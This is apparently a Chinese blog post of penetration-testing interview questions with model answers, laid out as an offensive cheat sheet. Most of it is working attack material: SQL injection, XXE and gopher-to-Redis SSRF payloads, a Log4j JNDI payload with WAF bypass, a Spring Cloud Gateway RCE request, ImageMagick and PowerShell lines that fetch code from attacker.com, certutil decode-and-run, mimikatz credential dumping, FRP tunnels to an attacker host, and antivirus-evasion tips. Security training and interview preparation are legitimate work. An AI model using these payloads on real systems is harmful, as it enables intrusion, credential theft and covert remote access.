2025年渗透测试面试题总结-43(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[🔍 漏洞挖掘深度指南](#🔍 漏洞挖掘深度指南)

[1. 简历通用漏洞实战要点(Top 5重点洞)](#1. 简历通用漏洞实战要点(Top 5重点洞))

[2. 漏洞利用研究核心逻辑](#2. 漏洞利用研究核心逻辑)

[3. 经典利用案例](#3. 经典利用案例)

[⚔️ 内网渗透实战突破](#⚔️ 内网渗透实战突破)

[1. Disable Function绕过(PHP场景)](#1. Disable Function绕过(PHP场景))

[2. Webshell提权路径](#2. Webshell提权路径)

[3. 内网渗透路线图](#3. 内网渗透路线图)

[4. 无扫描横向方案](#4. 无扫描横向方案)

[5. 无文件落地绕过杀软](#5. 无文件落地绕过杀软)

[6. 常用提权姿势速查表](#6. 常用提权姿势速查表)

[7. 内网代理之FRP高阶用法](#7. 内网代理之FRP高阶用法)

[💡 2025攻防新趋势](#💡 2025攻防新趋势)

复制代码
## 漏洞挖掘(重点关注)
1. 简历上的通用洞挨个问
2. 漏洞利用研究的理解
3. 漏洞利用研究的案例

## 内网(偏实战问题)
1. disable function bypass
2. webshell 提权(低权限 -> 高权限)
3. 已经拿到webshell,说说你的内网思路
4. 不允许扫描,如何横向
5. 存在杀软,不允许exe落地,怎么办
6. 常用的提权姿势
7. 内网代理,详细问了frp

🔍 漏洞挖掘深度指南

1. 简历通用漏洞实战要点(Top 5重点洞)
漏洞类型 攻击手法 绕过技巧
SQL注入 时间盲注SLEEP(2) + 堆叠查询;EXEC xp_cmdshell 绕WAF:/**/注释、0xHEX编码
RCE 命令拼接:&/` (Win)、;`(Linux)
XXE 外部实体注入:<!ENTITY xxe SYSTEM "file:///etc/passwd"> 协议限制绕过:php://filter/convert.base64-encode/resource=/etc/passwd
SSRF Gopher协议攻击Redis:gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$1%0d%0a%0a%0aconfig set dir /tmp%0aquit DNS重绑定(rbndr.us 服务)
反序列化 利用__wakeup()触发文件写入 字符逃逸:构造不匹配的{ }数量

📌 案例:2024年某OA系统RCE(CVE-2024-XXXX)

  • 利用链:JSON.parse()JNDI注入 → ldap://加载恶意类
  • 绕过:jndi:ldap://127.0.0.1#.evil.com/Exploit (利用#分割域名)
2. 漏洞利用研究核心逻辑
复制代码
mermaid`graph LR A[漏洞触发点] --> B[环境约束分析] B --> C[防护绕过设计] C --> D[稳定Exploit构造] D --> E[隐蔽性强化]`
  • 关键维度
    • 内存破坏类:ASLR/PIE绕过(Bruteforce地址)、ROP链构造
    • Web类:WAF规则逃逸(非常规HTTP头X-Forwarded-For: 127.0.0.1
    • 沙箱逃逸:检测进程树(ps -ef)、挂载点(/proc/self/mounts
3. 经典利用案例
  • Log4j2 JNDI注入(CVE-2021-44228)
    • Payload:${jndi:ldap://attacker.com/Exploit}
    • 绕过技巧:${${lower:j}ndi}(WAF规则规避)
  • Spring Cloud Gateway RCE(CVE-2022-22947)
    • 利用步骤:

      复制代码
      http`POST /actuator/gateway/routes/hacktest HTTP/1.1 {"filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"id\").getInputStream()))}"}}],"uri":"http://example.com"} `

⚔️ 内网渗透实战突破

1. Disable Function绕过(PHP场景)
绕过方式 适用条件 操作命令
LD_PRELOAD劫持 存在putenv() 利用代码
FFI扩展 PHP ≥7.4 + 启用FFI FFI::cdef('int system(char *cmd);')->system('id');
ImageMagick漏洞 存在图片处理功能 push graphic-context; execute 'curl attacker.com/shell.sh';
2. Webshell提权路径
复制代码
mermaid`graph TB A[低权限Shell] --> B{系统识别} B -->|Linux| C[/SUID提权/ Cron任务劫持] B -->|Windows| D[服务路径空格提权/ DLL劫持] C --> E[内核漏洞:DirtyPipe(CVE-2022-0847)] D --> F[令牌窃取:Incognito.exe] `
3. 内网渗透路线图

✅ 已获Webshell → 信息收集 → 权限提升 → 横向移动 → 持久化

  1. 信息收集
    • 网络拓扑:arp -a(Win)、ip route(Linux)
    • 凭证提取:mimikatz.exe sekurlsa::logonpasswords(Win)、/etc/shadow(Linux)
  2. 横向移动
    • 明文凭证 → PTH攻击(psexec.py
    • 无凭证 → IPv6路由欺骗(mitm6工具)
4. 无扫描横向方案
  • 基于日志的探测

    复制代码
    bash`# 利用Apache日志定位内网IP cat /var/log/apache2/access.log | grep -Po '10\.\d+\.\d+\.\d+' | sort -u `
  • DNS隧道探测

    复制代码
    bash`for i in {1..254}; do dig @192.168.1.$i test.com; done `
  • SMB匿名连接
    smbclient -L //192.168.1.1 -N

5. 无文件落地绕过杀软
  • PowerShell内存加载

    复制代码
    powershell`IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/PowerView.ps1') `
  • Windows自带工具利用

    • 执行Base64编码的exe:

      复制代码
      cmd`certutil -decode payload.b64 payload.exe & start payload.exe `
  • Linux进程注入

    复制代码
    bash`perl -e 'use MIME::Base64; eval(decode_base64("c3lzdGVtKCJpZCIpOw=="))'`
6. 常用提权姿势速查表
系统 提权方式 工具/EXP
Windows 服务路径空格 AccessChk.exe + MSI安装包劫持
JuicyPotato(CLSID劫持) JuicyPotato
Linux SUID滥用 find / -perm -4000 2>/dev/null
Capability提权 getcap -r / 2>/dev/null
7. 内网代理之FRP高阶用法

穿透架构

复制代码
[攻击机] ←公网→ [FRPS:7000] ←内网→ [Webshell:8080 → FRPC] → 内网目标 

关键配置

复制代码
ini`# frpc.ini (Webshell侧) [common] server_addr = attacker.com server_port = 7000 [proxies] type = tcp local_ip = 192.168.1.100 # 目标内网IP local_port = 3389 # 目标端口 remote_port = 6000 # 公网映射端口 `

流量隐匿

  • 加密:protocol = kcp + tls_enable = true
  • 混淆:vhost_http_port伪装成Web流量

💡 2025攻防新趋势

  1. AI对抗
    • 使用GAN生成免杀Shellcode(如DeepCobra 项目)
  2. 硬件层攻击
    • Intel CET绕过(基于分支历史注入)
  3. 云原生渗透
    • Kubernetes RBAC权限逃逸(kubectl create token --bound-object-kind

⚠️ 注:以上技术需在授权环境下测试,部分工具需自行编译规避AV检测(如使用garble 混淆Go程序)。